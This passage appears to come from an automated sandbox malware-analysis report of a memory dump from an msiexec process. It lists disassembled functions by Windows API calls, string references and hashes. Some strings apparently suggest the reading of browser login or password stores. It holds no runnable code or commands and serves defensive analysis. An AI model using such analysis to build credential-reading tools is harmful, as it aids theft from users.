                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                      • wcsrchr.MSVCRT ref: 00411B14
                      • wcscat.MSVCRT ref: 00411B2E
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: FileModuleNamememsetwcscatwcsrchr
                      • String ID: AE$.cfg$General$EA
                      • API String ID: 776488737-1622828088
                      • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                      • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                      APIs
                      • memset.MSVCRT ref: 0040D8BD
                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                      • memset.MSVCRT ref: 0040D906
                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                      • _wcsicmp.MSVCRT ref: 0040D92F
                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                      • String ID: sysdatetimepick32
                      • API String ID: 1028950076-4169760276
                      • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                      • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                      APIs
                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                      • memset.MSVCRT ref: 0041BA3D
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID: -journal$-wal
                      • API String ID: 438689982-2894717839
                      • Opcode ID: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                      • Opcode Fuzzy Hash: 4ac88023d002366decc5273a510af2ce11e9bf28f765889455521809b037904a
                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                      • EndDialog.USER32(?,00000002), ref: 00405C83
                      • EndDialog.USER32(?,00000001), ref: 00405C98
                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Item$Dialog$MessageSend
                      • String ID:
                      • API String ID: 3975816621-0
                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                      APIs
                      • _wcsicmp.MSVCRT ref: 00444D09
                      • _wcsicmp.MSVCRT ref: 00444D1E
                      • _wcsicmp.MSVCRT ref: 00444D33
                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _wcsicmp$wcslen$_memicmp
                      • String ID: .save$http://$https://$log profile$signIn
                      • API String ID: 1214746602-2708368587
                      • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                      • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                      APIs
                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                      • memset.MSVCRT ref: 00405E33
                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                      • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                      • String ID:
                      • API String ID: 2313361498-0
                      • Opcode ID: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                      • Opcode Fuzzy Hash: 4de784d2d0ac2fcdf607bdd3a0a0f40b32b06f5c685c24e95d41111086adbceb
                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                      APIs
                      • GetClientRect.USER32(?,?), ref: 00405F65
                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                      • GetWindow.USER32(00000000), ref: 00405F80
                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Window$ItemMessageRectSend$Client
                      • String ID:
                      • API String ID: 2047574939-0
                      • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                      • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                      APIs
                      • GetSystemTime.KERNEL32(?), ref: 00418836
                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                      • GetTickCount.KERNEL32 ref: 0041887D
                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                      • String ID:
                      • API String ID: 4218492932-0
                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                      APIs
                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$memset
                      • String ID: gj
                      • API String ID: 438689982-4203073231
                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                      • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                      • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                      • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                      APIs
                      • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy
                      • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                      • API String ID: 3510742995-2446657581
                      • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                      • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                      • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                      • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                      APIs
                      • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                      • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                      • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                      • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                      • memset.MSVCRT ref: 00405ABB
                      • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                      • SetFocus.USER32(?), ref: 00405B76
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: MessageSend$FocusItemmemset
                      • String ID:
                      • API String ID: 4281309102-0
                      • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                      • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                      • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                      • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _snwprintfwcscat
                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                      • API String ID: 384018552-4153097237
                      • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                      • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                      • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                      • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: ItemMenu$CountInfomemsetwcschr
                      • String ID: 0$6
                      • API String ID: 2029023288-3849865405
                      • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                      • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                      • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                      • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                      APIs
                        • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                      • memset.MSVCRT ref: 00405455
                      • memset.MSVCRT ref: 0040546C
                      • memset.MSVCRT ref: 00405483
                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                      • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$memcpy$ErrorLast
                      • String ID: 6$\
                      • API String ID: 404372293-1284684873
                      • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                      • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                      • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                      • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                      APIs
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AttributesErrorFileLastSleep$free
                      • String ID:
                      • API String ID: 1470729244-0
                      • Opcode ID: 675b33b2af9dcb3c53510e193b2b2860c3ea87b357ed647995c74d1772aabefc
                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                      • Opcode Fuzzy Hash: 675b33b2af9dcb3c53510e193b2b2860c3ea87b357ed647995c74d1772aabefc
                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                      APIs
                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                      • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                      • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                      • wcscpy.MSVCRT ref: 0040A0D9
                      • wcscat.MSVCRT ref: 0040A0E6
                      • wcscat.MSVCRT ref: 0040A0F5
                      • wcscpy.MSVCRT ref: 0040A107
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                      • String ID:
                      • API String ID: 1331804452-0
                      • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                      • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                      • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                      • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                      APIs
                        • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                      • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                      • String ID: advapi32.dll
                      • API String ID: 2012295524-4050573280
                      • Opcode ID: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                      • Instruction ID: 6b6c0a27b71384d3bff991c3c7ca7c9b0301c8735f49a3ee57333cb8f9a5f734
                      • Opcode Fuzzy Hash: b64713afd4556e5fbbb7ed04bcda3af9e72832f174230b27e3163565a40eb309
                      • Instruction Fuzzy Hash: 5F119470440700DDE6307F62EC0AF2777A4DF80714F104A3FE541565E1DBB8A8519AAD
                      APIs
                      Strings
                      • <?xml version="1.0" ?>, xrefs: 0041007C
                      • <%s>, xrefs: 004100A6
                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset$_snwprintf
                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                      • API String ID: 3473751417-2880344631
                      • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                      • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                      • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                      • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: wcscat$_snwprintfmemset
                      • String ID: %2.2X
                      • API String ID: 2521778956-791839006
                      • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                      • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                      • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                      • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: _snwprintfwcscpy
                      • String ID: dialog_%d$general$menu_%d$strings
                      • API String ID: 999028693-502967061
                      • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                      • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                      • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                      • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                      APIs
                      • strlen.MSVCRT ref: 00408DFA
                        • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
                      • memset.MSVCRT ref: 00408E46
                      • memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
                      • memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
                      • memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
                      • memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
                      • memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcpy$memsetstrlen
                      • String ID:
                      • API String ID: 2350177629-0
                      • Opcode ID: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                      • Instruction ID: 5f65aa9fdfa02acdbc3988aed820739efb0bf546d233f5e01752542f466a415e
                      • Opcode Fuzzy Hash: b0fd6244f294145fe9a6ea4e3d429f9bbf97f6839acfbc1745acf2347c5e71ea
                      • Instruction Fuzzy Hash: 3951017290050DBEEB51DAE8CC45FEFBBBCAB09304F004476F709E6155E6349B498BA6
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memset
                      • String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                      • API String ID: 2221118986-1606337402
                      • Opcode ID: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                      • Instruction ID: 7aef5b05df8cb417835a49add62511a3dd126d480fa81acd131143259a3eb597
                      • Opcode Fuzzy Hash: 10415b1a1c8003ecd0031fb780f2e77066144490245ccd4b04bba77302a40a65
                      • Instruction Fuzzy Hash: 5D818A706083219FDB10CF25E48162BB7E1EF84318F96885EEC949B256D738EC55CB9B
                      APIs
                      • _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
                      • memset.MSVCRT ref: 00408FD4
                      • memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
                      • memset.MSVCRT ref: 00409042
                      • memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
                        • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
                      Memory Dump Source
                      • Source File: 0000000C.00000002.2634633974.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_12_2_400000_msiexec.jbxd
                      Similarity
                      • API ID: memcmpmemset$_mbscpymemcpystrlen
                      • String ID:
                      • API String ID: 265355444-0
                      • Opcode ID: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                      • Instruction ID: d0ac777748d33e6673793c59e161d6f76d61048b6b1b65ce46f59eb5e56095ce
                      • Opcode Fuzzy Hash: a83a1467d2796da51f33b336eeec327ded5aa3ca15fd709dc7ec48effe5a66b1
                      • Instruction Fuzzy Hash: E241677190060CBEEB21DAA0DC45FDFB7BCAF04344F00443EF655E6182E675AA498BA5
                      APIs
                      • memset.MSVCRT ref: 004116FF
                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
